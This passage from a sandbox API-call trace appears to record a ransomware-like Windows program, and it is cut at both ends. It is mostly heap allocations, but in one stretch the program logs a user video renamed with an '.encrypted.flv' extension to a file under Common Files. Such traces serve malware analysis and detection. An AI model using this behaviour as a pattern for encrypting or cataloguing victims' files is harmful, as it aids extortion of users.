wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.199] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.199] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.200] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.200] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.200] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.200] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.200] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.200] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0043.200] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.200] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.201] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.201] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.201] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.201] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.201] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.201] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.201] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x36e5, lpOverlapped=0x0) returned 1 [0043.201] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.201] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x36e5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.201] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.201] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.201] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.encrypted.flv\r\n", cchWideChar=76, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 76 [0043.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4c) returned 0x7f3688 [0043.202] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.encrypted.flv\r\n", cchWideChar=76, lpMultiByteStr=0x7f3688, cbMultiByte=76, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ieBG H7.encrypted.flv\r\n", lpUsedDefaultChar=0x0) returned 76 [0043.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.202] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0043.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0043.202] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4b, lpOverlapped=0x0) returned 1 [0043.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0043.202] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.202] CloseHandle (hObject=0x128) returned 1 [0043.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.207] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.207] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.207] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.208] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.208] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0043.209] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.209] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.209] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0043.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0043.209] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0043.209] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.209] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0043.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0043.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0043.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.210] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.210] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.211] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.211] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.212] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 